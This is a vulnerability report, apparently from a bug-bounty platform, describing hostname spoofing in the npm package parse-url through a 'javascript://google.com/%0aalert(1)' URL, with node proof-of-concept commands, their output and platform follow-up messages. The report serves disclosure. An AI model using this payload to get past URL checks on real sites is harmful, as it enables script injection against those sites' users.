hostname spoofing via javascript in ionicabizau/parse-url
Valid
Reported on
Mar 4th 2022
Description
If use parse-url for security check on url, it is dangerous because hostname spoofing through JavaScript scheme is possible. It also occurred in url.parse() of node.js in 2018, and node.js acknowledged the vulnerability for this. So Node.js has patched it, and there are cases where a CVE was issued after the security release.
sh-3.2$ node -e 'console.log(require("url").parse("javascript://google.com/%0aalert(1)"))'
Url {
protocol: 'javascript:',
slashes: null,
auth: null,
host: null,
port: null,
hostname: null,
hash: null,
search: null,
query: null,
pathname: '//google.com/%0aalert(1)',
path: '//google.com/%0aalert(1)',
href: 'javascript://google.com/%0aalert(1)'
}
sh-3.2$
First of all, the above result is the result of url.parser() of node.js. If hostname is passed, it is recognized as a path.
Proof of Concept
sh-3.2$ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("javascript://google.com/%0aalert(1)"))'
{
protocols: [ 'javascript' ],
protocol: 'javascript',
port: null,
resource: 'google.com',
user: '',
pathname: '/%0aalert(1)',
hash: '',
search: '',
href: 'javascript://google.com/%0aalert(1)',
query: [Object: null prototype] {}
}
sh-3.2$
But unlike parse-url in node.js, it parses hostname correctly.
Refer to CVE-2018-12123
We are processing your report and will contact the
ionicabizau/parse-url
team within 24 hours.
2 years ago
We have sent a
fix follow up to the
ionicabizau/parse-url
team.
We will try again in 7 days.
2 years ago
We have sent a
second
fix follow up to the
ionicabizau/parse-url
team.
We will try again in 10 days.
2 years ago
We have sent a
third and final
fix follow up to the
ionicabizau/parse-url
team.
This report is now considered stale.
a year ago
to join this conversation